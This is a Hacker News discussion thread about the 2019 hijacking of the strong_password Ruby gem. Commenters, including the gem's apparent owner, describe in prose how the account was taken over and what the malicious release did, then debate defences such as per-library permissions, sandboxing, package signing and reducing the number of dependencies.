Hacker News new | past | comments | ask | show | jobs | submit login
Strong_password Rubygem hijacked (withatwist.dev)
625 points by jrochkind1 on July 7, 2019 | hide | past | favorite | 128 comments

Hi all. I'm the (actual) owner of that gem.

As already hypothesized in the comments I'm pretty sure this was a simple account hijack. The kickball user likely cracked an old password of mine from before I was using 1password that was leaked from who knows which of the various breaches that have occurred over the years.

I released that gem years ago and barely remembered even having a rubygems account since I'm not doing much OSS work these days. I simply forgot to rotate out that old password there as a result which is definitely my bad.

Since being notified and regaining ownership of the gem I've:

1. Removed the kickball gem owner. I don't know why rubygems did not do this automatically but they did not.

2. Reset to a new strong password specific to rubygems.org (haha) with 1password and secured my account with MFA.

3. Released a new version 0.0.8 of the gem so that anyone that unfortunately installed the bogus/yanked 0.0.7 version will hopefully update to the new/real version of the gem.

one more reason why to use a password manager and have a unique password.

Thanks for sharing the info!

This is a gem that checks the strength of a user-submitted password. It has a large number of downloads (37,000 on the legitimate 0.0.6 version). It looks like it's made to be integrated on webservers.

The modified gem downloaded and executed code stored in a editable Pastebin, meaning that the code could have changed at any time. Presumably, the malicious code would activate just by browsing any page on the affected site. One version of the Pastebin code would execute any code embedded in a magic cookie sent by a client. Plus, it would ping the attacker's server to let them know your webserver was infected.

Nasty, nasty stuff.

Good analysis, but I'm not sure about "a large number of downloads". Download counts can be pretty inflated due to CI/deployment processes that reinstall gems from scratch repeatedly. I've seen open-sourced gems that never got any real usage outside their original company get that number of downloads.

To add a bit of a sense of scale here, the popular Devise gem that's used for authentication in many Rails apps has 52.7 million total downloads and almost 20k stars on GitHub. strong_password has 247k total downloads and 191 stars. It has three reverse dependencies, none of which I've ever heard of and none of which have any of their own reverse dependencies.

This suggests to me that this gem is used by less than 1% of Ruby web apps (probably substantially less) and, more importantly, if you have a dependency on this gem you probably know (because it'd be a direct dependency in your Gemfile, not a dependency of a dependency).

So...we can all ignore how a popular ruby gem was hijacked and used to infect production webservers with malware because (to paraphrase) "it wasn't that popular"?

This was caught because the author diligently checked their dependencies line by line. How many ruby devs do that?

How many other gems are already hijacked but haven't been discovered because no-one has audited them? That number is almost certainly non-zero.

This is on Rubygems.org. They have enough information to warn devs that the gem might be infected (months since the maintainer logged in, gem version release without github repo changes, maintainer email on haveIbeenpwned and no password change since that date, etc).

No, I didn't say that, and I would prefer that you not put words in my mouth. I was responding to a single statement in the parent comment that I thought was inaccurate.

> a [...] ruby gem was hijacked and used to infect production webservers with malware

I wasn't aware of any reports of this being exploited in production. Do you have an example?

I agree with the rest of your comment about the need for more active measures on the part of Rubygems.org and the likelihood that other gems -- especially infrequently used, semi-abandoned ones like this -- have been hijacked without anyone detecting.

fair point, sorry for the implied impugn.

no, I don't have any examples, but then, it's not likely we're going to hear of any - anyone affected is probably unaware (until now, maybe). I guess some might come out of the woodwork now.

But again, Rubygems should have data on who downloaded this version of this gem, and so should be able to warn them, and even publish that data so we know not to visit their sites until they acknowledge and fix.

> This is a gem that checks the strength of a user-submitted password

Does it, though?


Indeed, replacing this with the list of top 100 passwords would be much more effective.

Or, alternatively, switching to the haveibeenpwned API[1] or zxcvbn[2].

[1]: https://haveibeenpwned.com/API/v2 [2]: https://github.com/dropbox/zxcvbn

It seems to do that too (comparing against a list of the top 500 passwords):


A long time ago I made a gem that does pretty much this: https://github.com/senorprogrammer/pil

If you want this functionality, I recommend not using it as-is, given the security vuln GitHub is currently reporting. Rather, anyone has my permission to copy the code verbatim into your project. It's a pretty simple gem.

Could you clarify?

Is the algorithm deficient?

To me that looks like code that indeed checks the strength, so I must be missing something.

It checks the length of a password, along with an arbitrary scalar for repeated characters. It does not do any entropy calculations.

The writer of that code at least needs to read https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpubli... one more time.

And, only in "production" mode. >:-\

The unanswered question is still how this `kickball` account gained control of the gem.

> The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019.

The way I see it, there are a few options:

1. The rubygem was transferred by ruby staff to this account.

2. The maintainer's account was hijacked and then it was transferred, and could even still be compromised.

3. There is some issue or attack vector with the rubygem system that allowed the attacker to gain control.

Any guesses?

Option 2 is overwhelmingly likely, IMO. Phishing, password reuse, credential scraping/spamming, and plain old brute force are unbelievably common.

That said, the other two options bear investigation too. Just don't spend time looking for a cold breeze from an un-caulked window frame when the screen door is open.

The true irony, of course, is that the package in question is designed (whether it does or not isn't the point, though I guess if it isn't very good then this becomes all the more humorous) to help prevent people from reusing common passwords or choosing passwords that are easy to brute force ;P... clearly the author should have used this package to select their password that protected the uploads of this package.

We don't know that. Their system could've been compromised in some other way and the password captured.

Yes. I think that we need to see a full security report from rubygems.org on this. This could be bigger than just the one package.

Agreed – a postmortem from rubygems.org on how the takeover occurred, and would be prevented next time, is something the Ruby community should expect/demand.

Do you feel that anyone in the community who isn't contributing financially or with their time to the project should expect to be able to "demand" anything from Ruby gems?

The lack of funding for foundational parts of many popular ecosystems (e.g. NPM, PyPI, Rubygems) never ceases to surprise me.

We've heard this before. Yes. Developers using this may decide not to use this gem. Ruby gems in general may lose trust.

If the goal of the project is adoption than do not ignore that group.

so you feel that a group of volunteers with limited funding should do what precisely?

as to losing adoption, that would only happen if

a) there were other options with better security, and given that npm, PyPI and others have had similar problems, there probably aren't

b) Developers would actually move ecosystem due to package manager weaknesses. given that hasn't happened with any of the previous instances of supply chain attacks (and this has been going on for 5+ years now) I don't think so.

As one example, rubygems was compromised in 2013 https://news.ycombinator.com/item?id=5139583 did you or anyone else stop using it as a result?

rubygems is actually given some funding by Ruby Together, I'm not sure with what current budget. https://rubytogether.org/

based on their home page they're somewhere near the lower end of the $20k-$35k category for all funding...

I think that is per month? But not sure.

Think you could be right there, so not a tiny amount of cash but looking at their page not even enough to have a full time dev on the gem tools...

Obv. as a security person I'd say they should prioritise security things like audits and improved Authentication requirements for gem owners, but realistically sounds like just keeping the lights on is pretty expensive.

They work on adding other features to rubygems and other things they fund. If I were them, I would work on nothing but security of rubygems.org gem releases.

Yet another example of supply chain attacks. How do businesses seriously allow their devs to pull code from outside sources, it blows my mind. Npm, Ruby gems, etc etc etc.


4. The maintainer of the gem is complicit in the attack, and transferred ownership voluntary.

Yes, we all remember Dominic Tarr's event-stream handover to an anonymous hacker because maintaining it "wasn't fun anymore" https://gist.github.com/dominictarr/9fd9c1024c94592bc7268d36...

That's an extremely ungenerous interpretation of those events. He shouldn't have handed over control of the package to someone he barely knew, but from his perspective, it was that or let the package die. He volunteered his time, he had no kind of obligation to continue if he didn't want to. His actions were certainly not malicious, and he was clearly not "complicit" with the hacker, which is what you're implying.

That incident highlighted a broadly systemic problem with how these kinds of packages are maintained, it was not a case of "one bad maintainer".

I was referring more to the "transferred ownership voluntary" part, not to the complicit, so no, I'm not implying that.

But it is really interesting to see the atmosphere around this systemic problem. Maintainers don't realize that transferring ownership can be putting users in danger, they'd rather transfer the ownership to a random stranger than mark the package abandoned, then they deny it was ever so serious and ask for more money, and their friends and followers rise up to protect them, without ever addressing the central issue, yeah, that's a systemic problem.

Oh come on, you're still giving this guy shit for making a mistake while spending his free time developing it?

Well he still didn't admit it was a bad move, putting other people in danger. If it's abandoned, mark it abandoned, let others fork it. So simple.

Not sure why someone with malicious intent would use their rubygems superpower just to compromise a low profile gem like this. Perhaps it is a targeted attack at a certain website which may now be compromised and we are just seeing the tip of the iceberg.

Option 1 was referring to the attacker tricking a staff working into handing control to them. Maybe by claiming its abandoned?

My bet goes to #3. After [0]this commit, everything is possible in Ruby world.


That seems to demonstrate a github vulnerability, rather than anything ruby-specific?

It was a Rails vulnerability (mass assignment) that the attacker used to accomplish this. It’s long since been fixed and doesn’t demonstrate an inherent security flaw with the “ruby world.”


We need a sort of capability and permission method for libraries.

For example a "strong_password" library should only by given "CPU compute" permissions, no I/O.

But even with this, the problem will be like we see on phone, popular libraries will require all the permissions.

You'll want to install React, and React + it's 100 dependencies will request everything.

To be honest, even the coarsest-possible permissions of "can do I/O" vs. "can't do I/O" would be exceedingly effective at stymieing these sorts of attacks; all malicious software of this sort needs to do I/O at some point, and relatively few libraries actually have a good excuse to do I/O (though logging might be thorny).

That said it seems easier said than done to impose those sorts of restrictions on a per-dependency basis. Attempts to statically verify the absence of I/O sounds like a great game of whack-a-mole, and I don't know how you'd do it dynamically without running all non-I/O dependencies in an entirely separate process from the main program.

> few libraries actually have a good excuse to do I/O (though logging might be thorny).

Yeah, logging would be tricky...

Maybe a "logging" capability could be created. Separated from other I/O.

Such a capability would be weird, and nonstandard, and messy, cutting across several several abstraction layers. But if pulled off, it might be worth the effort.

That's solved in similar frameworks by separating open and read/write. You open (or inherit from somewhere) a logging socket, drop the open privileges, retain the permission to write to the log socket.

This discussion is basically inventing a per-library pledge(2).

or apparmor, selinux, grsec, tomoyo, ... But those systems can't integrate into scripting language per-library use case without some serious thread / IPC overhead.

These others can achieve what's intended, but the entire flavour of the discussion is a dead ringer for pledge's purpose and interface, which is much simpler and very much internal to the software (a self-check of sorts).

Haskell indirectly solves this by separating `trace` (a form of logging) from IO (trace is a procedure that logs function call while all other IO must be contained in an IO monad).

> That said it seems easier said than done to impose those sorts of restrictions on a per-dependency basis.

Isn't this the sort of thing type inference is made for? Along with return types, functions have an io type if they're marked (std lib) or if they contain a marked function. Otherwise they have the pure type.

Doing this usefully does require more than just “does IO” — e.g. does that mean it can load another module, read a list of too-common passwords, write to a log file, or read your ~/.aws/credentials? Similarly, does allowing networking mean it can talk to anything or just a few well-known hostnames and ports?

This isn’t to say that it’s a bad idea but there are a ton of details which get annoying fast. I know the Rust community was looking into the options after the last NPM hijack was in the news but it sounded like it’d take years to make it meaningfully better.

If you're running Haskell. Few other languages can do it.

> running all non-I/O dependencies in an entirely separate process from the main program.

Maybe that's not such a bad idea. This "strong_password" thing is written in Ruby, a few milliseconds delay is probably not noticeable anyway and vastly preferable given the security implications.

particularly in ruby where your code can pretty much redefine anything anywhere else in the code whenever it wants.

A whole lot of security is playing whack-a-mole at the end of the day.

The design of macOS and iOS has been moving this way. Many of Apple's first-party applications and frameworks have been broken down into backend "XPC services" that (attempt to) follow the principle of least privilege[1]. Each service runs in a separate process, the system enforcing memory isolation and limiting access to resources (sandboxing).

It's a good idea on paper, but has caveats. Every service is responsible for properly authenticating its clients, and needs to be designed so that a compromised client cannot leverage its access to a service to elevate privileges. Sandboxes are difficult to retrofit onto existing programs. The earlier, lowest-common-denominator system frameworks were not originally written with sandboxing in mind. There are numerous performance drawbacks.

For Apple ecosystem developers, XPC services are also how "extensions" for VPN, Safari ad blockers, etc. are written, for a mix of security and stability benefits.

Though funnily enough, as Apple has pursued these technologies, many HN commenters have decried the walls of the garden closing in.

1: https://en.wikipedia.org/wiki/Principle_of_least_privilege

Hm, interesting. One way to solve this would be to have a language with a very rigid import system - it should be _impossible_ for a library to use a module it hasn't imported, even if that module has been loaded elsewhere in a process. This is probably harder than it looks, and many languages have introspection features that are incompatible with this goal.

With a rigid import system, each library would be forced to declare what it's going to import (including any system libraries), and then you could e.g. enforce a warning + confirmation any time an updated dependency changes its import list.

It doesn't prevent you from getting owned by a modified privileged library, but it's better than the current case. Unfortunately, it probably requires some language (re-)design to fully implement this approach.

> With a rigid import system, each library would be forced to declare what it's going to import (including any system libraries), and then you could e.g. enforce a warning + confirmation any time an updated dependency changes its import list.

Which means you would get warnings on pretty much any functional upgrade of most dependencies, which would make the whole system useless from a security point of view.

In theory, a point release of a library really shouldn’t be requiring new permissions, and you shouldn’t be randomly upgrading your code to newer major versions without checking for compatibility anyway.

Why should a functional upgrade of a dependency introduce new dependencies anyway? A library that sets out to do a particular thing shouldn’t grow new features that require new capabilities willy-nilly.

> Why should a functional upgrade of a dependency introduce new dependencies anyway? A library that sets out to do a particular thing shouldn’t grow new features that require new capabilities willy-nilly.

Why not? I've often done upgrades with the sole purpose of replacing questionable, hand-written code with external dependencies I've discovered that do the same thing, but better (more features, more tests, more eyes on the code, more fixed issue reports than my often-closed-source code). From string parsing to networking, this happens a lot. The external contracts of my libraries don't change a bit, so why waste a major version? "I'm using someone else's code instead of what I YOLO'd myself" seems like a poor reason to rev a package version--and even if it's not, where do you draw the line? Cribbing code from StackOverflow?

this reminds me of the Boeing 737 MAX8...

> Hm, interesting. One way to solve this would be to have a language with a very rigid import system - it should be _impossible_ for a library to use a module it hasn't imported, even if that module has been loaded elsewhere in a process. This is probably harder than it looks, and many languages have introspection features that are incompatible with this goal.

This _should_ be achievable with Go.

If you look at dependencies as black-boxes that contain their own transitive dependencies, then sure, any given "root-level" dependency of sufficient complexity might end up requesting every permission.

On the other hand, if each dependency in the deps tree had its own required permissions, and you had to grant those permissions to that specific dependency rather than to the rootmost branch of the deps tree that contained it, then things would be a lot nicer. The more fine-grained library authors were in splitting out dependencies, the clearer the permissions situation would be; it'd be clear that e.g. a "left-pad" package way down in the tree wouldn't need any system access.

On the other hand, it'd make sense if dependencies could only add new transitive dependencies during "version update due to automatic version-constraint re-evaluation" if the computed transitive closure of the required permissions didn't increase. Otherwise it'd stop and ask you whether you wanted to authorize the addition of a dep that now asked for these additional permissions.

It's also worth noting that under this system, if you trust a large library like React, but don't trust its dependencies, you might still trust that React is sandboxing its own imports correctly -- and then you could "inherit" React's permissions and be fine without overriding anything.

If you're really worried, then you still could go over your entire tree and override the default settings. But there's nothing that would mean you would be required to do that.

People are thinking about this using the phone/website model, where permissions are only applied at one level. With dependencies, whatever giant framework that you're pulling in could be using the same permissions system to secure its own dependencies, which would make you significantly safer.

Under the current system, you have to hope that none of the authors in your dependency chain make a mistake and get compromised. If everybody can sandbox anything, then you only have to hope that most of those authors don't make a mistake.

If somebody attaches malware to a dependency of a dependency, and if even one person along that chain is following best practices and saying, "yeah, I don't think this needs a special permission", then they've likely just prevented that attack from affecting anyone else deeper down the dependency chain.

Sandboxing in package managers is something that could actually scale pretty well; much better than it does for websites/phones/computers.

That seems like a strategy that would cause significant slowdowns and hassles in development.

High-level (i.e. consuming a lot of dependencies at a lot of levels) tools would simply apply a "allow everything" dependency policy rather than deal with tons of issue reports from people who wanted to import the high-level library in a less-than-root-permissioned project.

Additionally, lots of upgrades do increase the dependency surface. Resolving local usernames is a pretty fundamental thing a lot of dependencies would need. Now consider the libc switch from resolving names via /etc/passwd to resolving from multiple sources (including nslcd, a network/local-network service). If every dependency up the tree adopted a "lowest possible needed IO surface" permission model and then that change happened, it would be hell to pay: maintainers would take the shortest path and open up too many permissions; maintainers wouldn't upgrade and leave some packages trapped in a no-man's-land; or maintainers would give up on pulling in prone-to-changing-permissions dependencies, leading to even more fragmentation.

This idea is baked into the core of Deno. See, for example, https://deno.land/manual.html#permissionswhitelist.

Safe Haskell, a GHC extension, is one example in this space. https://downloads.haskell.org/~ghc/latest/docs/html/users_gu...

Its biggest selling point is that a lot of capability safety could be inferred in packages without the package author separately specifying capabilities.

The basic idea is to disallow the remaining impure escape hatches in Haskell in most code, requiring library authors of libraries that do require those escape hatches (e.g. wrappers around C libraries) to assert that their library is trustworthy, and requiring users to accept that trustworthy declaration in a per-user database.

It actually was very promising because the general coding conventions within Haskell libraries made most of them automatically safe, so the set of packages you needed to manually verify wasn't insane (but still unfortunately not a trivial burden, especially if your packages relied on a lot of C FFI).

Unfortunately I have yet to see it used in any commercial projects and it seems in general not to get as much attention as some other GHC extensions.

I know this is about ruby, but it's worth noting that this kind of thing would be solved by effect systems, e.g. Haskell's IO type. If IO isn't part of the signature, you know it's cpu only. Furthermore, you can get more specific such as having a DB type to indicate some code only has access to databases rather than the internet as a whole.

I think you'd also need to prevent things like unsafePerformIO, and equivalent loopholes.

While that might be true, you are not going to switch the world to program in Haskell.

We need a solution which also works for most used languages, JS/C++/Java/Python..., which suggests that it should be done at a higher level, maybe with OS involvement somehow.

Java actually has a pretty useful and powerful securitymanager concept, that nearly noone uses :/

Ruby itself did have something akin to this known as SAFE levels, which prevented IO, exiting the program, etc: https://ruby-hacking-guide.github.io/security.html

Unfortunately, it seems like it's been removed since Ruby 2.1: https://bugs.ruby-lang.org/issues/8468

The shame is that they would have played nicely with the upcoming "guilds" stuff, IMHO.

The .NET Framework 1.0 included "Code Access Security" which included mechanisms to authenticate code with "evidence" (as opposed to traditional 'roles') and the apply permissions similar to your example: DnsPermission, FileIOPermission, RegistryPermission, UIPermission, and so on.

Unfortunately, the architecture was too complex for most developers and fell to the wayside. It was finally removed from the 4.0 Framework after being deprecated for some time.





So, we need a version of pledge from OpenBSD that can surround components / classes https://man.openbsd.org/pledge.2 https://www.youtube.com/watch?v=bXO6nelFt-E

Linux has seccomp for the same purpose. The most restrictive mode of seccomp permits only read, write and exit, which is good for a jailed CPU-only process (read/write commands from a pipe and exit when done - no opening new files or sockets).

There is a bunch of work going on for this in JavaScript see https://www.infoq.com/news/2019/06/making-npm-install-safe/ for links.

Couldn't you theoretically shove all of your untrusted "non-I/O" libraries into a Service Worker? They wouldn't have direct access to the DOM or network I/O that way. It would involve writing some glue code, but perhaps it's worth trading that off for increased "security" (trust)?

EDIT: never mind, looks like I was mistaken about the network i/o part of this... Might be interesting to have a browser-level "sandboxed service worker" for this purpose though...

The skeptic in me thinks that it's never going to work in practice due to 'worse is better': Any system with the 'I/O vs no-I/O' system will have more friction than one without it, and there is no measurable benefit until you get hacked, so most people will not use it (or declare everything as I/O).

That is a brilliant idea. I'm surprised I haven't heard/thought of that yet.

we can't retrofit this onto an existing community and code base... see Python 3 for details. People just won't make extensive changes to their code base is they can't see an immediate, tangible, benefit.

For some languages it might possible to enforce this with just a simple linter

In light of vulnerabilities like these, I’m glad there are developers that spend time to make their apps more secure. Thus, making us all aware that issues like these are out there. Security is almost always just put off in exchange for features and security is most of the time taken for granted. It’s about time that we start taking it seriously.

Kudos to you!

It seems to me like the only way to really provide any sense of security is to force gems uploaded to RubyGems to be signed. There is some discussion here (https://github.com/rubygems/guides/pull/70) about why the Rubygems PGP CA isn't really worth using in its current state. As we've seen with Javascript dependencies, we can only put off dealing with this problem for so long.

Just as an experiment, I want everyone on this thread to think back to the last time you connected over SSH to a new computer on a company network. Did you check to make sure that the key that popped up was correct, or did you just hit accept?

This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks. Devs will still have their keys compromised, users will still ignore warnings that keys have changed. It's worth doing, but I am skeptical that it will eliminate these attacks.

In the Javascript world, we got malware recently that was the result of a dev voluntarily giving control of a package to another person. Signing isn't going to help with that.

My vote is on permissions and sandboxing. I think that sandboxing scales reasonably well since it can be applied to dependencies of dependencies all the way down your entire chain. I think that (unlike with phones) most dependencies don't require stuff like File I/O or Networking, which would eliminate a large number of attacks.

And importantly, I think that sandboxing acknowledges that trust is not binary. The big problem with signing packages is that it's following this outdated model of, "well, you'll either trust a package completely or you won't." The reality is that there are packages and package authors that you trust to different degrees and in different contexts. Many buildings have locks inside of them as well as outside, because trusting someone enough to come into your office is not the same as trusting them to root through all of your filing cabinets.

I don't think efforts around verifying authors/updates are useless, but they do often fail to take this principle into account.

>Did you check to make sure that the key that popped up was correct, or did you just hit accept?

But if you had the key cached, and it changed, you’d probably freak out.

>This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks.

You’ve just isolated the impact of these attacks to new installs, how is that not significant?

> But if you had the key cached, and it changed, you’d probably freak out.

Not in the servers-as-cattle age. By default, a rebuilt server will have a new key. Otherwise, you'd have to save the server SSH key in your configuration/build files, and then you've moved what you have to protect to the source control of the servers, and probably exposed that secret key to many more people and developers than you would have done by leaving the key on the server.

Jumping one stratum forward, with hosted k8s you don't even know the host's key; you do everything via HTTPS and the almost globally accepted list of secure CA:s.

Don’t you just use your own SSH CA when you scale up?

Okay, followup question -- when was the last time anyone saw the key change and actually did freak out?

If you're using VMs, keys change all the time. Maybe some people here are good about security and would freak out, but I'm thinking about workplaces I've been at, and that's not a typical attitude for developers that I know. If I set up a VM at work and changed the keys on it, I doubt my coworkers would even ask me about it when they saw the warning.

And I'm literally right there -- they're not going to file a Github issue for a developer they've never met asking why the key changed and then stop working until they get a response.

To push the point even more, how many people on here actually wrote down the SSH fingerprint that they got the first time they connected to a remote machine? When you got a new laptop, did you transfer the keys over, or did you just blindly reconnect to every VM again?

Package managers are meant to help you manage installs on multiple machine, so it's not just the first time you use a package -- it's every time you do a fresh clone the repository, it's every time you throw away your cache and do a new reinstall over the network.

And it's based on this idea that even when doing an update, package managers and developers won't just blindly hit OK if they get a notification that a key changed, which I just don't think is the norm, even in technical circles.

>Okay, followup question -- when was the last time anyone saw the key change and actually did freak out?

Less than a week ago, a server of mine rebooted due to an unannounced power outage. This particular server just stores some backups and didn’t have proper monitoring, I didn’t know it had rebooted. Normally mere unannounced power outages have me shitting bricks, switching hosts or at least extensively verifying the pre-boot environment.

Trying to SSH into the box I received the host key mismatch error because the server boots into dropbear for LUKS. It took me a few minutes to figure out what had happened, but until I did, I definitely fully assumed that my host was up to something really bad.

> Okay, followup question -- when was the last time anyone saw the key change and actually did freak out?

Every time. Well, "freak out" is a strong phrase. But I do check with knowledgeable member of team before continuing.

Another solution would be changing the ecosystem to no longer be reliant on so many third party dependencies.

For instance if I am using Java and I build my web app with only Spring Framework, I can have a lot more confidence that one of my JARs hasn’t been backdoored than I can in an ecosystem where it’s regularly the practice to pull 100s of dependencies from different individual FOSS developers, where it’s difficult to audit the process that each library author is using to secure their package manager upload credentials.

I am not sure signatures are that useful since without a centralized authority to issue the certificates and securely verify author identities, we are just back to a trust-on-first-use policy for the signatures, and people will just end up setting their CI servers to always trust new signatures since they won’t want to deal with what happens when authors change their certificate from version to version (which will surely happen).

Sure, obviously reinventing as many wheels as possible will minimize your exposure to third-party malfeasance.

As in all forms of engineering there are, of course, no absolutes, only trade-offs to be made.

The more wheels you reinvent, the slower your velocity for solving the core business problems that pay your bills. Moving too slowly can be fatal to the business. It’s a tricky balance. Signing isn’t perfect, but it can improve some aspects of some balances people strike.

It's not about the amount of functionality shifted to dependencies, but about the fragmentation of these dependencies.

Packaging and distribution of libraries takes effort to do it properly, so they're only done properly if it's sufficiently centralized. If you have to import fifty third-party wheels, then it's unavoidable that some or most of these wheels can't be managed properly, but it's quite feasible to have a single (or three) well-managed third-party package that provides a hundred wheels so that you don't have to reinvent them. If the strong_password gem was integrated in (for example) Rails and managed/released by the same team with the same processes, then this risk would be avoided. If instead of a dozen separate gems with every functionality separate you'd have a single bundle of varied functionality like in Java there's Guava or Appache Commons, then that bundle can handle release management in a way that each separate gem developer can not.

If you want to have reliable dependencies then you eithery have to choose only dependencies with buraucratic and pedantic release governance, or manage/audit each dependency yourself (as the author of the original article seems to have done). In ecosystems where it's reasonable to have serious projects that have 0-3 distinct (but large) external dependencies this works easily; in ecosystems where you have dozens or even a hundred dependencies, that overhead is impractical for most projects.

> If you want to have reliable dependencies then you eithery have to choose only dependencies with buraucratic and pedantic release governance, or manage/audit each dependency yourself

That's a false dichotomy. There are middle grounds which can and do work at scale:

Upgrade knowingly and deliberately (don't just spray greenkeeper everywhere).

Carefully monitor changed application/network behavior after upgrades.

Devote a manageable, non-zero amount of time to reading/finding security bulletins or security incidents on your most-heavily-used dependencies.

Pay attention to issue reports and prioritize any with possible security implications.

...and (at a slightly larger scale) hire, empower, and compensate people to do those kinds of things in a systematic, regular way.

Seriously, security engineering isn't served well by "ZOMG NPM is garbage we must switch to $megaframework and pray that their release engineers get everything right" hysteria and absolutism. There are effective, moderate strategies that help with these issues every day.

I think we can simplify that middle ground proposal down to two items:

1) only upgrade dependencies “knowingly and deliberately” (as the author of this article did). What does this mean if not auditing the upgrades? Just upgrading more rarely (e.g. because you know you need a specific feature or bug fix), but still auditing them? By waiting to upgrade, the diff will be vastly larger and performing an audit to “knowingly” upgrade will be much more difficult.

2) detecting a breach after you’ve already installed an attacker’s code onto your servers, via active monitoring or by hoping someone else does active monitoring or auditing and reports the issue to you or to a central authority.

#1 as a “middle ground” doesn’t seem too different from the post you responded to. #2 is what most projects seem to rely on - hope someone else finds the problem and reports it, and that they don’t get hit too hard in the meantime.

What I’d say though is that in an ecosystem like Java, it’s not necessarily “reinventing the wheel”. It’s more that you can import Spring, Guava, and Apache Commons and you have a collection of 1000s of wheels of different shapes and sizes ready to go when you need them.

Whereas in some other ecosystems, you have to go get each wheel individually from a different person. There are certainly reasons why each ecosystem evolved the way it did, but I don’t think it’s impossible that this sort of stuff could centralize more in the future, especially as it becomes more clear what should be “batteries included” or what things are actually needed and used by the community.

> What I’d say though is that in an ecosystem like Java, it’s not necessarily “reinventing the wheel”. It’s more that you can import Spring, Guava, and Apache Commons and you have a collection of 1000s of wheels of different shapes and sizes ready to go when you need them.

Sure, but even here we see you modulating your position from “only Spring” to “Spring, Guava, and Apache Commons”, tripling the number of dependencies you’re willing to admit.

Really what it boils down to is, you’re saying what I’m saying. Declaring absolutely “this dependency, and no others” is silly — rather, it’s a question of trade-offs, and you feel that in your usecases trading off say, 3 or 4 large dependencies is worth the velocity gain. Nobody is arguing with that.

Fewer, larger, carefully considered dependencies is a relational set of trade-offs to make.

I interpreted that differently: it's fine to have many dependencies, even third-party ones. What's a problem is having many third-parties.

The maintenance and trust verification overhead for a micro "5 lines of code" dependency is usually way higher than just rewriting those 5 lines yourself.

As an aside: just because someone made their code available doesn't mean it's good or that it solves all your edge cases. Getting those fixed also takes up time.

> The maintenance and trust verification overhead for a micro "5 lines of code" dependency is usually way higher than just rewriting those 5 lines yourself.

Sure. I was in no way advocating “JS-style, 5 line microlibs Uber Alles”, merely pointing out that there’s a clear trade-off between dependencies and velocity that there’s no silver bullet for.

There’s absolutely nothing wrong with OP saying “we can afford to make Spring our only dependency”, but there’s also nothing wrong with saying “we need actor-based concurrency and the business will be dead before we roll are own, let’s bring in Akka”, “we need to deal with time and spending 40 hours a month keeping up with every legislature on the planet’s timezone-related lawmaking doesn’t pay the bills, bring in JodaTime”, etc.

It’s engineering; these trade-offs should of course be carefully considered (is_even should fail most any sane consideration), but it’s a bit silly to suggest they can just be avoided entirely by businesses that have to make money to pay the bills.

Again, signing helps when you need to make those trade-offs. There are no absolutes here.

I think those are great examples of what I was talking about actually in the Java ecosystem.

JodaTime is now deprecated in favor of Java 8 time (JSR-310). Akka is an official library from Typesafe/Lightbend. In a JVM ecosystem, you can get this kind of stuff directly from a supported corporate vendor. You can even easily pay them for support if you want. And a lot of times stuff even gets standardized through the JSR process.

Now, if you’re in a pre-Java 8 world and you need JodaTime, sure it makes sense to bring it in, not just use only Spring. But eventually that software library gets recognized as necessary to the ecosystem and standardized, and you no longer have to rely on yet another 3rd party for it.

Whereas in another ecosystem, JodaTime might just keep existing, maybe even alongside the bad default language library, and everyone has to always be told to go get this third party dependency if you want to do things right.

Reinventing the wheel is one end of the spectrum, but so is putting a bunch of magic words in a file and thinking you needn't worry. (To be fair, too many tutorials hand wave away what really happens in Gemfile/package.json/etc and barely pay lip service, if at all, to the responsibilities that come with having those dependencies) I don't miss the "old" days of searching for libs, extracting a zip, and trying to figure out the integration steps, but there is something to be said for there being a bit more of a sense of ownership.

> Reinventing the wheel is one end of the spectrum, but so is putting a bunch of magic words in a file and thinking you needn't worry.

Yeah. I didn’t claim otherwise? Like I said, there are only trade-offs here. You can gain a ton of velocity if you abstract it all out to a file of 50,000 “magic words”; but obviously then your exposure to these issues is enormous.

Trade-offs are like that.

> I don't miss the "old" days of searching for libs, extracting a zip, and trying to figure out the integration steps, but there is something to be said for there being a bit more of a sense of ownership.

Eh, to the extent that I get any such feeling, I think it’s mostly a completely false sense of security. I did some stuff in a C++ codebase that was fully developed that way, and did the ol’ “hunt, unzip, and compile” for some boost libs. I didn’t audit the source. It being boost C++ god knows if I’d even have been able to recognize a heavily template-metaprogrammed exploit.

If boost’s account had been compromised I’d have been every bit as fucked as people who use this gem were. Supply chain attacks are dangerous regardless. All you can do is try to balance your exposure vs your time spent on solving problems that don’t pay the bills vs those that do.

> I think it’s mostly a completely false sense of security

I wasn't so much thinking about avoiding vulns due to added scrutiny as much as issues with updated libs, since most build processes pull gems, etc when deploying or rebuilding a container; I don't think many vendor the gems. Typically you'd ship the actual files you unzipped as opposed to letting the package manager grab the most recent version within version spec.

Typically your deployment process would pull gems based on hashes recorded in a lock file you committed, not pull arbitrary new versions automagically. So while I’m not shipping the actual file, something is verifying that I’m shipping files that have the hash I expect. Barring some very alarming developments in hash insecurity, it’s mostly a distinction without a difference.

Automating a “bundle update” to pull latest versions within spec and update the lockfile would be odd to my experience. You’d typically do that manually, (hopefully, if you’re competent) look at what changed, and retest (semver is great as long as everyone perfectly anticipates & categorizes every change’s impact. In the real world, however, ....) rather than blindly just letting a deployment run whatever.

Bad devs can do the stupidest thing imaginable in any system, though, so I don’t doubt this is out there.

> The more wheels you reinvent, the slower your velocity for solving the core business problems that pay your bills.

And the more mistakes you make, pissing off your users (or worse, compromising their data because you thought you could roll-your-own of some security critical dependency you ditched).

I doubt that any solutions which start off as “let’s change the whole universe” are going to get very far.

Yes, the situation sucks. I just looked at the frontend of a relatively small app we use for administration, and it depends on almost 5000 node modules versions. But this problem needs to be dealt with as soon as possible, and I don’t think that a fundamental change in development culture—making everything harder for developers in the process—is going to help.

5000? Wow. That's gotta be a pretty sizable fraction of the entire Node library ecosystem. Does it count duplicates?

With a dependency forest that large, it's small wonder that not more JS projects aren't compromised by bad dependencies...

Create React App is pretty popular and it has 36k dependencies. That’s not saying everyone using it ships every one of those but that’s definitely a LOT of people who could potentially introduce malware, often with a fair chance of it being deniable.

I know there has been some recent discussion within the python community that Python's batteries included philosophy is failing the community, with some arguing that the python standard library should be streamlined. But I see third party dependencies as often a liability both for security and a kind of technical debt (I maintain infrequently used but essential legacy python applications)

Requiring signatures moves all responsibility to the maintainers. I've seen projects upload their signing private keys to git, saying that it's fine because they are passphrase protected.

